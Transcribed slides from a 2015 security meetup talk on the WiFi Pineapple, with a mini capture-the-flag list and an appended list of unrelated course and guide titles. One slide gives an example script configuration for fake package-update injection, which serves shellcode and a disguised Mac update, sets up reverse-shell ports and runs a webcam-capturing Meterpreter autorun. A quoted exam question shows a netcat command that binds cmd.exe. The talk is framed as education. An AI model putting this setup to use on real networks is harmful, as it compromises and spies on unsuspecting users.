Pineapple Analysis July 15, For Educational Purposes Only

Size: px
Start display at page:

Download "Pineapple Analysis July 15, For Educational Purposes Only"

Transcription

1 WELCOME TO Please hang out and socialize prior to the meeting Hungry? Fill out an order sheet located on the table and bring up to the bar - please use full name Thirsty? Head up to the bar and order a beverage

2 Pineapple Analysis July 15, 2015 For Educational Purposes Only

3 Agenda Introduce Tonight s Topic Info Sec News Upcoming Conferences Job Opportunities Upcoming Meetings Membership Benefits Communications Pineapple Analysis Discussion

4 Tonight s Topic Pineapple Analysis Tonight we will combine two previous topics: Wifi Pineapple & Wireshark Afterwards, a mini capture the flag event

5 Info Sec News Euclid Analytics And Retailers: How Stores Like Nordstrom Track You Via Your Smartphone's Wi-Fi Signal Three Politicians Hacked Using Unsecured Wi-Fi Network Hacking Team orchestrated brazen BGP hack to hijack IPs it didn t own Hacker hunts and pwns WiFi Pineapples with zero-day at Def Con Firefox blacklists Flash player due to unpatched 0-day vulnerabilities

6 Upcoming Conferences Blackhat Las Vegas Defcon Las Vegas HTCIA Orlando Events page

7 Job Opportunities Open Discussion Job openings Companies looking to hire Anybody looking for a job?

8 Upcoming Meetings August 19, 2015 Learning Ruby for Security Professionals September 16, 2015 Automated Penetration Testing

9 Member Benefits O Reilly Discount code for books Use the UG Program discount code: DSUG Secure Larger discount for SEC.MN 2016 members. Stay tuned

10 Communications Website Meetings, slide archives, and resources Mailing List Social Media Twitter Google+ Community LinkedIn Group Facebook

11 5-Minute Break Bio Break Order Food or Drink Grab a seat if you were late Ask Patrick about his hollow leg

12 Pineapple Analysis By: Mat Wilcek

13 Topic Agenda Level Set: What is the Wifi Pineapple What is the Raspberry Pi What are some antennas you can use Personal lessons learned Some ways to use the Pineapple Use cases

14 CYA Stuff None of what you hear tonight is beneficial in your professional career Really! Tonight is for educational purposes only. Learn what others are doing around you and mitigate that risk. Unless you re a professional pen-tester with a get out of jail free card, you may get in trouble, fired, or worse.

15 Assumptions/Declarations You heard the previous talks You can use Google, Bing, Yahoo, etc. You can watch YouTube videos I won t show you how to manage your devices tonight I expect you to ask questions if I gloss over something

16 WiFi Pineapple (Marketing Blurb) From the website: The WiFi Pineapple is a unique device developed by Hak5 for the purpose of WiFi auditing and penetration testing. The WiFi Pineapple is the only hardware with dual integrated radios custom built for advanced wireless attacks. Atheros AR9331 system on a chip (SoC), includes a 400 MHz MIPS processor, 16 MB ROM and 64 MB RAM, Onboard is the infamous Realtek RTL8187 radio with monitor and injection capabilities, a Micro SD memory expansion port, a bank of configurable auto-attack mode switches, a USB 2.0 host port and 10/100 Ethernet port.

17 Raspberry Pi (Marketing Blurb) From the website: The Raspberry Pi is a low cost, credit-card sized computer that plugs into a computer monitor or TV, and uses a standard keyboard and mouse. [Allows people to] learn how to program in languages like Scratch and Python. The Raspberry Pi Foundation is a registered educational charity (registration number ) based in the UK. Our Foundation s goal is to advance the education of adults and children, particularly in the field of computers, computer science and related subjects.

18 Home Setup Raspberry Pi 2, Model B 64GB SD

19 Home Setup

20 Home Setup

21 Antennas Super Power Supply 1 x 16dBi Yagi Wireless 2.4GHz High Gain Booster Directional WiFi Antenna (SMA)

22 Antennas Alfa AWUSO36NH High Gain USB Wireless G / N Long-Rang WiFi Network Adapter ***My opinion: One of the best chipsets for Backtrack/Kali (tools for WiFi stuff)

23 Antennas NooElec NESDR Mini USB RTL-SDR & ADS-B Receiver Set, RTL2832U & R820T Tuner, MCX Input. R820T Tuner & ESD-Safe Antenna Input

24 Other Necessary Resources

25 And Finally

26 And Finally

27 Personal Lessons Learned Nano is much better than VI (shut it) Technology is hard when you make it that way If a dummy like me can do it, what s happening when the smart people are malicious? Directional means you have to point it the right way! Additionally, pay attention to SMA vs. RPSMA. Sticking to the topic while drinking Monster is hard Arguments for using Kali or Linux instead of the Pineapple Arguments that the Pineapple is insecure

28 Use Cases Messing With People Package Update Injection Airplane Monitoring MitM (packet inspection)

29 Use Cases Messing with People Specific DNS Spoofing Hello World Random Roll Karma

30 Use Cases Package Update Injection

31 Package Update CONFIGURATION / VARIABLES (example script) # [Payload Information] # Custom Windows Payload (blank will default to metasploit) windows_payload="payloads/shellcode-tcp.exe" # Custom Mac PKG Payload - can be created with "osx_payload_installer" in the resources/ directory. mac_payload="payloads/apple_macosx_update.pkg" # Port for Mac reverse shells osx_port="6446" # Port for other Windows meterpreter shells (such as windows_payload) win_port="587" # Port for Windows PowerShell shells (requires a different AutoRunScript) ps_win_port="8080" # Port for Linux reverse shells nix_port="8443" # Meterpreter AutoRunScript - Assosiated with ${windows_payload} echo -e "duplicate -r p D duplicate -r p D webcam -f -p /tmp/collected " > /tmp/autorun.rc

32 Use Cases Airplane Monitoring (not in-flight WiFi)

33 Use Cases Man in the Middle Easiest = Connect to your laptop & run Packet Capture (run the script from Hak5)

34 2 minute overview on TCP

35 2 minute overview on TCP

36 2 minute overview on TCP

37 2 minute overview on TCP

38 2 minute overview on UDP (Chad Walker Protocol) This protocol talks and doesn t care if anyone listens (or stops listening)

39 Encapsulation

40 Packet Capture FAQ s Wireshark vs. Tcpdump Duplicate ACKs Why so many broadcasts?

41 Questions? (answers cost you a beer payable to me)

42 CTF Event Download the Pcaps from Jake s laptop here: Challenges: lvl1 - Find the username and password. lvl2 - What IP is scanning a host? What ports are open? lvl3 - What reflected XSS vulnerability was successfully exploited? lvl4 - What type of wireless attack was conducted? lvl5 - What is the Make, Model, and Serial # of the access point broadcasting the SSID '.'? lvl6 - Find sensitive data in the packet capture being transferred. *hint* Not a password lvl7 - What does the voice message say in the capture?

ISDP 2018 Industry Skill Development Program In association with

ISDP 2018 Industry Skill Development Program In association with ISDP 2018 Industry Skill Development Program In association with Penetration Testing What is penetration testing? Penetration testing is simply an assessment in a industry computer network to test the

More information

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK Hacker Academy Ltd COURSES CATALOGUE Hacker Academy Ltd. LONDON UK TABLE OF CONTENTS Basic Level Courses... 3 1. Information Security Awareness for End Users... 3 2. Information Security Awareness for

More information

Principles of ICT Systems and Data Security

Principles of ICT Systems and Data Security Principles of ICT Systems and Data Security Ethical Hacking Ethical Hacking What is ethical hacking? Ethical Hacking It is a process where a computer security expert, who specialises in penetration testing

More information

How do I setup a Raspberry Pi?

How do I setup a Raspberry Pi? If you would like to setup a Raspberry Pi to run QRUQSP code, the following steps will walk you through downloading an SD image and configuring your Raspberry Pi. Step 1 of 17 - Equipment Required In order

More information

Capture The Flag Challenge Prep Class

Capture The Flag Challenge Prep Class Capture The Flag Challenge Prep Class CTF??? A traditional outdoor game where two teams each have a flag (or other marker) and The objective is to capture the other team's flag, located at the team's "base,"

More information

Frequently Asked Questions. OTA (Firmware Upgrades) & Parental Registration

Frequently Asked Questions. OTA (Firmware Upgrades) & Parental Registration Frequently Asked Questions OTA (Firmware Upgrades) & Parental Registration Q: What is OTA? Why is this important for me to know? A: OTA is a firmware upgrade to your Meep! that brings the Meep! to the

More information

Home Airwaves Radio. User s Guide. January 2017

Home Airwaves Radio. User s Guide. January 2017 Home Airwaves Radio User s Guide January 2017 The Home Airwaves Radio User s Guide covers hardware set-up, logging in, adding/deleting radio stations, listening capabilities, and unit configuration. This

More information

THE NEW LANDSCAPE OF AIRBORNE CYBERATTACKS

THE NEW LANDSCAPE OF AIRBORNE CYBERATTACKS SESSION ID: MBS-W04 THE NEW LANDSCAPE OF AIRBORNE CYBERATTACKS Nadir Izrael CTO & Co-Founder Armis, Inc. Ben Seri Head of Research Armis, Inc. Placeholder Slide: Image of spread of infection Placeholder

More information

SECURITY ON PUBLIC WI-FI New Zealand. A guide to help you stay safe online while using public Wi-Fi

SECURITY ON PUBLIC WI-FI New Zealand. A guide to help you stay safe online while using public Wi-Fi SECURITY ON PUBLIC WI-FI New Zealand A guide to help you stay safe online while using public Wi-Fi WHAT S YOUR WI-FI PASSWORD? Enter password for the COFFEE_TIME Wi-Fi network An all too common question

More information

CHCSS. Certified Hands-on Cyber Security Specialist (510)

CHCSS. Certified Hands-on Cyber Security Specialist (510) CHCSS Certified Hands-on Cyber Security Specialist () SYLLABUS 2018 Certified Hands-on Cyber Security Specialist () 2 Course Description Entry level cyber security course intended for an audience looking

More information

RF Fun with ESP8266 Devices and Software Defined Radio

RF Fun with ESP8266 Devices and Software Defined Radio RF Fun with ESP8266 Devices and Software Defined Radio Is that a dongle in your pocket or are you just happy to.. Jeff Murri KK4ETK Independent Security Researcher murrij@gmail.com Twittertubes: @infosec208

More information

Ethical Hacking and Prevention

Ethical Hacking and Prevention Ethical Hacking and Prevention This course is mapped to the popular Ethical Hacking and Prevention Certification Exam from US-Council. This course is meant for those professionals who are looking for comprehensive

More information

Project 3: Network Security

Project 3: Network Security CIS 331 October 3, 2017 Introduction to Networks & Security Project 3: Network Security Project 3: Network Security This project is due on Tuesday, October 17 at 10 p.m.. You must work in teams of two

More information

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking Summer Training Internship Program 2017 (STIP - 2017) is a practical oriented & industrial level training program for all students who have aspiration to work in the core technical industry domain. This

More information

Metasploit: The Penetration Tester's Guide PDF

Metasploit: The Penetration Tester's Guide PDF Metasploit: The Penetration Tester's Guide PDF "The best guide to the Metasploit Framework."—HD Moore, Founder of the Metasploit Project The Metasploit Framework makes discovering, exploiting, and

More information

Drone /12/2018. Threat Model. Description. Threats. Threat Source Risk Status Date Created

Drone /12/2018. Threat Model. Description. Threats. Threat Source Risk Status Date Created Drone - 2 04/12/2018 Threat Model Description Threats Threat Source Risk Status Date Created Mobile Phone: Sensitive Data Leakage Smart Devices Mobile Phone: Session Hijacking Smart Devices Mobile Phone:

More information

What? Why? How? Dave Botherway November

What? Why? How? Dave Botherway November What? Why? How? Dave Botherway November - 2016 Connecting any Computer-type devices PCs, Tablets, Phones, GPS Smart TV, Smart Watches, Fitbit-type devices Printers, Modems, Routers, Network Storage Keyboards,

More information

What action do you want to perform by issuing the above command?

What action do you want to perform by issuing the above command? 1 GIAC - GPEN GIACCertified Penetration Tester QUESTION: 1 You execute the following netcat command: c:\target\nc -1 -p 53 -d -e cmd.exe What action do you want to perform by issuing the above command?

More information

Detection and Countermeasures for COTS Drones Adrian Stevens, IMT

Detection and Countermeasures for COTS Drones Adrian Stevens, IMT A-TEMP-009-1 ISSUE 002 Detection and Countermeasures for COTS Drones Adrian Stevens, IMT 15 th Little Crow Conference, 18 May 2017 Presentation Overview Background Understanding the Threat Detection and

More information

Raspberry Pi 3 Model B

Raspberry Pi 3 Model B Raspberry Pi 3 Model B Product Name Raspberry Pi 3 Product Description The Raspberry Pi 3 Model B is the third generation Raspberry Pi. This powerful credit-card sized single board computer can be used

More information

Ethical Hacker Foundation and Security Analysts Course Semester 2

Ethical Hacker Foundation and Security Analysts Course Semester 2 Brochure Software Education Ethical Hacker Foundation and Security Analysts Course Semester 2 The Security Management Course is a graduate-level foundation course in the Information Security space. Brochure

More information

TexSaw Penetration Te st in g

TexSaw Penetration Te st in g TexSaw Penetration Te st in g What is penetration testing? The process of breaking something or using something for an unintended used case for the purpose of bettering the system or application. This

More information

Post Connection Attacks

Post Connection Attacks Post Connection Attacks All the attacks we carried out in the previous sections can be done without knowing the key to the AP, ie: without connecting to the target network. We saw how we can control all

More information

Contents in Detail. Acknowledgments

Contents in Detail. Acknowledgments Acknowledgments xix Introduction What s in This Book... xxii What Is Ethical Hacking?... xxiii Penetration Testing... xxiii Military and Espionage... xxiii Why Hackers Use Linux... xxiv Linux Is Open Source....

More information

Hackveda Training - Ethical Hacking, Networking & Security

Hackveda Training - Ethical Hacking, Networking & Security Hackveda Training - Ethical Hacking, Networking & Security Day1: Hacking windows 7 / 8 system and security Part1 a.) Windows Login Password Bypass manually without CD / DVD b.) Windows Login Password Bypass

More information

AnyMeeting Instructions

AnyMeeting Instructions AnyMeeting Instructions AnyMeeting is a FREE video conferencing service that allows up to 200 participants in a meeting, by invitation. It is supported by advertising, which will be displayed on screen,

More information

Cross Platform Penetration Testing Suite

Cross Platform Penetration Testing Suite Cross Platform Penetration Testing Suite Ms. Shyaml Virnodkar, Rahul Gupta, Tejas Bharambe 1Asst Professor, Department of Computer Engineering, K J Somaiya Institute of Engineering and Information Technology,

More information

Mobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing

Mobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing Mobile Malfeasance Exploring Dangerous Mobile Code Jason Haddix, Director of Penetration Testing Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to

More information

CSC 4992 Cyber Security Practice

CSC 4992 Cyber Security Practice CSC 4992 Cyber Security Practice Fengwei Zhang Wayne State University CSC 4992 Cyber Security Practice 1 Who Am I? Fengwei Zhang Assistant Professor of Computer Science Office: Maccabees Building, Room

More information

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services Following topics will be covered: Module 1: Penetration Testing Planning and Scoping - Types of penetration testing and ethical hacking projects - Penetration testing methodology - Limitations and benefits

More information

Coding for Penetration

Coding for Penetration Coding for Penetration Testers Building Better Tools Jason Andress Ryan Linn ELSEVIER AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO SINGAPORE SYDNEY TOKYO Syngress is

More information

Hacking Exposed Wireless: Wireless Security Secrets & Colutions Ebooks Free

Hacking Exposed Wireless: Wireless Security Secrets & Colutions Ebooks Free Hacking Exposed Wireless: Wireless Security Secrets & Colutions Ebooks Free The latest wireless security solutions Protect your wireless systems from crippling attacks using the detailed security information

More information

Ethical Hacking as a Professional Penetration Testing Technique ISSA Southern Tier & Rochester Chapters

Ethical Hacking as a Professional Penetration Testing Technique ISSA Southern Tier & Rochester Chapters Ethical Hacking as a Professional Penetration Testing Technique ISSA Southern Tier & Rochester Chapters - Durkee Consulting, Inc. Background Founder of Durkee Consulting since 1996 Founder of Rochester

More information

WI-FI HUB+ TROUBLESHOOTING GUIDE

WI-FI HUB+ TROUBLESHOOTING GUIDE WI-FI HUB+ TROUBLESHOOTING GUIDE Overview This guide is here to provide some answers to some commonly asked questions about your Wi-Fi Hub+. Tip: you can connect to your Wi-Fi Hub+ using an Ethernet cable

More information

DIS10.1 Ethical Hacking and Countermeasures

DIS10.1 Ethical Hacking and Countermeasures DIS10.1 Ethical Hacking and Countermeasures ABOUT DIS Why choose Us. Data and internet security council is the worlds top most information security certification body. Our uniquely designed course for

More information

[PDF] Hacking: The Ultimate Beginners Guide To The World Of Hacking

[PDF] Hacking: The Ultimate Beginners Guide To The World Of Hacking [PDF] Hacking: The Ultimate Beginners Guide To The World Of Hacking In the world of information technology (IT), hacking is the manipulation of the normal behavior of network connections, systems and computer

More information

Penetration testing using Kali Linux - Network Discovery

Penetration testing using Kali Linux - Network Discovery Penetration testing using Kali Linux - Network Discovery by Riazul H. Rozen Sept. 14, 2017 4 minute read Table of Contents Importance of penetration testing Kali Linux in penetration testing Network Discovery

More information

1. Introduction P Package Contents 1.

1. Introduction P Package Contents 1. 1 Contents 1. Introduction ------------------------------------------------------------------------------- P. 3-5 1.1 Package Contents 1.2 Tablet Overview 2. Using the Tablet for the first time ---------------------------------------------------

More information

Cisco Networking Academy CCNA Cybersecurity Operations 1.1 Curriculum Overview Updated July 2018

Cisco Networking Academy CCNA Cybersecurity Operations 1.1 Curriculum Overview Updated July 2018 Cisco Networking Academy CCNA Cybersecurity Operations 1.1 Curriculum Overview Updated July 2018 Cybersecurity Opportunities Cybercrime Costs Security Spending Cybersecurity Ventures: Cybersecurity Market

More information

Security Course. WebGoat Lab sessions

Security Course. WebGoat Lab sessions Security Course WebGoat Lab sessions WebGoat Lab sessions overview Initial Setup Tamper Data Web Goat Lab Session 4 Access Control, session information stealing Lab Session 2 HTTP Basics Sniffing Parameter

More information

SCALE 15x (c) 2017 Ty Shipman

SCALE 15x (c) 2017 Ty Shipman Please view my linked-in page (under See more) to get a copy of this presenta

More information

Endpoint Security - what-if analysis 1

Endpoint Security - what-if analysis 1 Endpoint Security - what-if analysis 1 07/23/2017 Threat Model Threats Threat Source Risk Status Date Created File Manipulation File System Medium Accessing, Modifying or Executing Executable Files File

More information

Man-In-The-Browser Attacks. Daniel Tomescu

Man-In-The-Browser Attacks. Daniel Tomescu Man-In-The-Browser Attacks Daniel Tomescu 1 About me Work and education: Pentester @ KPMG Romania Moderator @ Romanian Security Team MSc. Eng. @ University Politehnica of Bucharest OSCP, CREST CRT Interests:

More information

How To Install Flash Firefox Android Tablet Os On Hp

How To Install Flash Firefox Android Tablet Os On Hp How To Install Flash Firefox Android Tablet Os On Hp Adobe may have cut support for Flash in Android Jelly Bean and beyond, but it's not don't officially support Flash, it's really easy to add Flash support

More information

Hacking: Hacking Made Easy 1: Beginners: Python: Python Programming For Beginners, Computer Science, Computer Programming Ebooks Free

Hacking: Hacking Made Easy 1: Beginners: Python: Python Programming For Beginners, Computer Science, Computer Programming Ebooks Free Hacking: Hacking Made Easy 1: Beginners: Python: Python Programming For Beginners, Computer Science, Computer Programming Ebooks Free â â â NEW RELEASE!!â â â Get This Book At A Limited Time Discount of

More information

MTAT Research Seminar in Cryptography The Security of Mozilla Firefox s Extensions

MTAT Research Seminar in Cryptography The Security of Mozilla Firefox s Extensions MTAT.07.019 Research Seminar in Cryptography The Security of Mozilla Firefox s Extensions Kristjan Krips 1 Introduction Mozilla Firefox has 24.05% of the recorded usage share of web browsers as of October

More information

Raspberry Pi Workshop

Raspberry Pi Workshop Raspberry Pi Workshop Resources and Materials: http://bit.ly/h8dunp Presenters Nick Yee Aexander Nunes Adriana Ieraci Agenda 10:00 Registration 10:20 Introductions and Overview 10:50 Install OS and Boot

More information

CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker. Upcoming Dates. Course Description. Course Outline

CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker. Upcoming Dates. Course Description. Course Outline CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker Learn to find security vulnerabilities before the bad guys do! The Certified Ethical Hacker (CEH) class immerses students in an interactive environment

More information

DIS10.1:Ethical Hacking and Countermeasures

DIS10.1:Ethical Hacking and Countermeasures 1 Data and Information security Council DIS10.1:Ethical Hacking and Countermeasures HACKERS ARE NOT BORN, THEY BECOME HACKER About DIS :Data and Internet Security Council DIS is the Globally trusted Brand

More information

Lab 0: Intro to running Jupyter Notebook on a Raspberry Pi

Lab 0: Intro to running Jupyter Notebook on a Raspberry Pi Lab 0: Intro to running Jupyter Notebook on a Raspberry Pi Nick Antipa, Li-Hao Yeh, based on labs by Jon Tamir and Frank Ong January 24, 2018 This lab will walk you through setting up your Raspberry Pi

More information

Penetration Testing with Kali Linux

Penetration Testing with Kali Linux Penetration Testing with Kali Linux PWK Copyright Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security No part of this publication, in whole or in part, may

More information

Technology Basics and Social Networking Presented by Gina Lobdell Graduate Student at Purdue University

Technology Basics and Social Networking Presented by Gina Lobdell Graduate Student at Purdue University Technology Basics and Social Networking Presented by Gina Lobdell Graduate Student at Purdue University Photo Copyright 2012 AgVenture. All Rights Reserved. Welcome Goals of the workshop: Gain a better

More information

Wireless Security Algorithms

Wireless Security Algorithms (NOTE: If you are using a virtual lab to run your attacks you will need an external Wi Fi attachment. The other option is to have a direct install on your computer. Virtual labs cannot access your wireless

More information

The R25 Robot Series

The R25 Robot Series The R25 Robot Series Network Setup Guide Contents Overview 2 Configuration 3 On-Screen Menu Configuration 3 Network Test 4 USB Simple Configuration WEP and WPA/WPA2-Personal 5 USB Simple Configuration

More information

5 Steps Wifi Hacking Cracking WPA2 Password

5 Steps Wifi Hacking Cracking WPA2 Password Advertise Here Contact Us Request Tutorial Write for Us Download» Hacking Knowledge Hacking News Hacking Tutorial Hacking Widget Online Tools» Tips and Trick Website» Phone Hacking Search 9,517 91 +525

More information

A Model for Penetration Testing

A Model for Penetration Testing A Model for Penetration Testing Chuck Easttom Collin College Professional Development chuck@chuckeasttom.com Research Gate Publication Abstract Penetration testing is an increasingly integral part of cyber

More information

The 3 Pillars of SharePoint Security

The 3 Pillars of SharePoint Security The 3 Pillars of SharePoint Security Liam Cleary CEO/Owner SharePlicity Jeff Melnick Systems Engineer Netwrix Corporation AGENDA The Problem Attack Vectors Intranet, Extranet and Public Facing Proactive

More information

Wireless Penetration Testing For Realz and WCTF

Wireless Penetration Testing For Realz and WCTF Wireless Penetration Testing For Realz and WCTF @Rmellendick rmellendick@gmail.com @DaKahuna2007 da.kahuna@gmail.com DISCLAIMER This is provided for informational purposes only. It is illegal in most countries,

More information

Programming Low-Cost Hardware Using Simulink Brian McKay MathWorks Technical Marketing

Programming Low-Cost Hardware Using Simulink Brian McKay MathWorks Technical Marketing Programming Low-Cost Hardware Using Simulink Brian McKay MathWorks Technical Marketing 2014 The MathWorks, Inc. Simulink Support for Low-Cost Hardware What does that mean? Simulink supports a selection

More information

Metasploit. Installation Guide Release 4.4

Metasploit. Installation Guide Release 4.4 Metasploit Installation Guide Release 4.4 TABLE OF CONTENTS About this Guide Target Audience...1 Organization...1 Document Conventions...1 Support...2 Support for Metasploit Pro and Metasploit Express...2

More information

IT SECURITY FOR LIBRARIES PART 1: SECURING YOUR LIBRARY BRIAN PICHMAN EVOLVE PROJECT

IT SECURITY FOR LIBRARIES PART 1: SECURING YOUR LIBRARY BRIAN PICHMAN EVOLVE PROJECT IT SECURITY FOR LIBRARIES PART 1: SECURING YOUR LIBRARY BRIAN PICHMAN EVOLVE PROJECT AGENDA A high level overview of what to implement in your library to make it secure. With the rise of data breaches,

More information

Milo R25 Networking Guide

Milo R25 Networking Guide Milo R25 Networking Guide Contents Overview... 1 Configuration... 2 On-Screen Menu Configuration... 2 Network Test... 3 USB Simple Configuration WEP and WPA/WPA2-Personal... 4 USB Simple Configuration

More information

RESIDENCY IN-SERVICE TRAINING EXAMINATION (RITE) ONLINE ADMINISTRATION INSITUTION PREPARATION GUIDE AMERICAN ACADEMY OF NEUROLOGY

RESIDENCY IN-SERVICE TRAINING EXAMINATION (RITE) ONLINE ADMINISTRATION INSITUTION PREPARATION GUIDE AMERICAN ACADEMY OF NEUROLOGY RESIDENCY IN-SERVICE TRAINING EXAMINATION (RITE) ONLINE ADMINISTRATION INSITUTION PREPARATION GUIDE AMERICAN ACADEMY OF NEUROLOGY Contents Instructions to Prepare for Testing... 2 System Requirements for

More information

Wireless Networking. Chapter The McGraw-Hill Companies, Inc. All rights reserved

Wireless Networking. Chapter The McGraw-Hill Companies, Inc. All rights reserved Wireless Networking Chapter 23 Overview In this chapter, you will learn how to Discuss wireless networking components Analyze and explain wireless networking standards Install and configure wireless networks

More information

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook 1 2 The information provided in this manual is to be used for educational purposes only. The authors

More information

ALEXA SETUP User Guide

ALEXA SETUP User Guide 1. PRODUCT ANALYZE ALEXA SETUP User Guide 1. Two ways to download LITEdge App A. Scan the QR code to download LITEdge App B. Download LITEdge App from App Store or Google Play and install it in your phone.

More information

HACKING: Beginner's Crash Course - Essential Guide To Practical: Computer Hacking, Hacking For Beginners, & Penetration Testing (Computer Systems,

HACKING: Beginner's Crash Course - Essential Guide To Practical: Computer Hacking, Hacking For Beginners, & Penetration Testing (Computer Systems, HACKING: Beginner's Crash Course - Essential Guide To Practical: Computer Hacking, Hacking For Beginners, & Penetration Testing (Computer Systems, Computer Programming, Computer Science Book 1) Ebooks

More information

Online Intensive Ethical Hacking Training

Online Intensive Ethical Hacking Training Online Intensive Ethical Hacking Training Feel the heat of Security and Learn something out of the box 0 About the Course This is a 7 Days Intensive Training Program on Ethical Hacking & Cyber Security.

More information

Ethical Hacking. Content Outline: Session 1

Ethical Hacking. Content Outline: Session 1 Ethical Hacking Content Outline: Session 1 Ethics & Hacking Hacking history : How it all begin - Why is security needed? - What is ethical hacking? - Ethical Hacker Vs Malicious hacker - Types of Hackers

More information

What every attorney should know about E-security Also, ESI

What every attorney should know about E-security Also, ESI What every attorney should know about E-security Also, ESI Sean Markham Esq. McCarthy Law Firm, LLC smarkham@mccarthy-lawfirm.com Why should I care about security? Because it is a good idea! and, if that

More information

Copyright 2006 Prentice-Hall. All rights reserved. 1

Copyright 2006 Prentice-Hall. All rights reserved. 1 PC Basics CPSC 100 Hardware Software Networking Copyright 2006 Prentice-Hall. All rights reserved. 1 Objectives Identify basic components of a computer (hardware) Gain insight into how computers work (software)

More information

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted. Volume: 119 Questions Question No: 1 John Smith uses a coffee shop's Internet hot-spot (no authentication or encryption) to transfer funds between his checking and savings accounts at his bank's website.

More information

Scanning. Introduction to Hacking. Networking Concepts. Windows Hacking. Linux Hacking. Virus and Worms. Foot Printing.

Scanning. Introduction to Hacking. Networking Concepts. Windows Hacking. Linux Hacking. Virus and Worms. Foot Printing. I Introduction to Hacking Important Terminology Ethical Hacking vs. Hacking Effects of Hacking on Business Why Ethical Hacking Is Necessary Skills of an Ethical Hacker What Is Penetration Testing? Networking

More information

Wi-Fi Advanced Stealth BlackHat US, Las Vegas August 2-3, 2006

Wi-Fi Advanced Stealth BlackHat US, Las Vegas August 2-3, 2006 Wi-Fi Advanced Stealth BlackHat US, Las Vegas August 2-3, 2006 Laurent BUTTI & Franck VEYSSET France Telecom Division R&D firstname dot lastname AT orange-ft dot com Who Are We? Network security experts

More information

Cooking with Team 279

Cooking with Team 279 Cooking with Team 279 Intro to the Raspberry Pi FIRST Team 279 Tech Fusion http://team279.com - https://twitter.com/team_279 Author: Michael Lehman What is a System on a Chip? From Wikipedia: A system

More information

Evil Twin Wireless Access Point Attack

Evil Twin Wireless Access Point Attack Evil Twin Wireless Access Point Attack 1 Evil Twin Wireless Access Point Attack Submitted to Dr. Stephan Robila CSIT 520 Network Security By Dan Ginsberg Department of Computer Science Montclair State

More information

GETTING THE MOST OUT OF EVIL TWIN

GETTING THE MOST OUT OF EVIL TWIN GETTING THE MOST OUT OF EVIL TWIN B-SIDES ATHENS 2016 GEORGE CHATZISOFRONIOU (@_sophron) sophron@census-labs.com www.census-labs.com > WHOAMI Security Engineer at CENSUS S.A. Cryptography, Wi-Fi hacking,

More information

Cross-site request forgery Cross-site scripting Man-in-the-browser Session hijacking Malware Man-in-the-middle DNS cache poisoning DNS spoofing DNS hijacking Dictionary attacks DDoS DDoS Eavesdropping

More information

RaRa Academy: Raspberry Pi. Karl Heinz Kremer - K5KHK

RaRa Academy: Raspberry Pi. Karl Heinz Kremer - K5KHK RaRa Academy: Raspberry Pi Karl Heinz Kremer - K5KHK Why Are We Here? I cannot convert you into a Raspberry Pi (or Linux) expert in two hours I cannot teach you everything there is to know about using

More information

Pearson: Certified Ethical Hacker Version 9. Course Outline. Pearson: Certified Ethical Hacker Version 9.

Pearson: Certified Ethical Hacker Version 9. Course Outline. Pearson: Certified Ethical Hacker Version 9. Course Outline Pearson: Certified Ethical Hacker Version 9 29 Sep 2018 Contents 1. Course Objective 2. Expert Instructor-Led Training 3. ADA Compliant & JAWS Compatible Platform 4. State of the Art Educator

More information

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo ETHICAL HACKING (CEH) CURRICULUM Introduction to Ethical Hacking What is Hacking? Who is a Hacker? Skills of a Hacker? Types of Hackers? What are the Ethics and Legality?? Who are at the risk of Hacking

More information

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Welcome Back! A Quick Recap of the Last Presentation: Overview of web technologies. What it is. How it works. Why it s attractive

More information

Course 831 EC-Council Certified Ethical Hacker v10 (CEH)

Course 831 EC-Council Certified Ethical Hacker v10 (CEH) Course 831 EC-Council Certified Ethical Hacker v10 (CEH) Duration: 5 days What You Get: CEH v10 Certification exam voucher 5 days of high quality classroom training 18 comprehensive modules 40% of class

More information

Yun Shield User Manual VERSION: 1.0. Yun Shield User Manual 1 / Version Description Date. 0.1 Initiate 2014-Jun-21

Yun Shield User Manual VERSION: 1.0. Yun Shield User Manual 1 / Version Description Date. 0.1 Initiate 2014-Jun-21 Yun Shield User Manual VERSION: 1.0 Version Description Date 0.1 Initiate 2014-Jun-21 1.0 Release 2014-Jul-08 Yun Shield User Manual 1 / 22 Index: 1 Introduction... 3 1.1 What is Yun Shield... 3 1.2 Specifications...

More information

CompTIA Security+ Malware. Threats and Vulnerabilities Vulnerability Management

CompTIA Security+ Malware. Threats and Vulnerabilities Vulnerability Management CompTIA Security+ Lecture Six Threats and Vulnerabilities Vulnerability Management Copyright 2011 - VTC Malware Malicious code refers to software threats to network and systems, including viruses, Trojan

More information

Protect Your Application with Secure Coding Practices. Barrie Dempster & Jason Foy JAM306 February 6, 2013

Protect Your Application with Secure Coding Practices. Barrie Dempster & Jason Foy JAM306 February 6, 2013 Protect Your Application with Secure Coding Practices Barrie Dempster & Jason Foy JAM306 February 6, 2013 BlackBerry Security Team Approximately 120 people work within the BlackBerry Security Team Security

More information

Everyday Digital Skills Projects Plus skills learned through the project

